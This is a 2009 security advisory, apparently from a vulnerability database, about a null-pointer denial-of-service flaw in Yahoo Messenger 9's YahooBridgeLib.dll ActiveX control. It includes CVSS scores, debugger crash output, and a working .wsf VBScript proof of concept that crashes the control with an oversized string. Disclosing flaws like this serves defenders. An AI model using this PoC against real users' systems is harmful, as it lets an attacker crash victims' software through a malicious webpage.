Yahoo Messenger 9 ActiveX DoS (Null Pointer) Vulnerability

2009.11.16
Risk: Low
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Product: Yahoo Messenger 9.0.0.2162 ************************************************************************ ******** Vulnerability: ActiveX Null Pointer - Denial of Service ************************************************************************ ******** Description: Yahoo Messenger is prone to a denial-of-service (cause of null pointer) vulnerability. Vulnerability is in YahooBridgeLib.dll (Activex Control) An attacker can exploit this vulnerability by enticing an unsuspecting victim to view a malicious webpage. ************************************************************************ ******** Credits: HACKATTACK IT SECURITY GmbH Penetration Testing in Deutschland - sterreich - Schweiz www.hackattack.com ************************************************************************ ******** Debugger Results: (1910.1a18): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=100092b4 ecx=018f0898 edx=002ae8d4 esi=00000000 edi=00000000 eip=10001074 esp=002ae858 ebp=002ae8dc iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** WARNING: Unable to verify checksum for C:\Program Files\Yahoo!\Messenger\YahooBridgeLib.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Yahoo!\Messenger\YahooBridgeLib.dll - YahooBridgeLib+0x1074: 10001074 8b08 mov ecx,dword ptr [eax] ds:0023:00000000=???????? 0:000> !analyze -v ... ... ... PRIMARY_PROBLEM_CLASS: NULL_POINTER_READ DEFAULT_BUCKET_ID: NULL_POINTER_READ ************************************************************************ ******** PoC (.wsf script) : <?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' /> <script language='vbscript'> arg1=String(11284, "A") target.RegisterMe arg1 </script> </job> </package>

References:

http://xforce.iss.net/xforce/xfdb/54263
http://www.securityfocus.com/bid/37007
http://www.securityfocus.com/archive/1/archive/1/507818/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top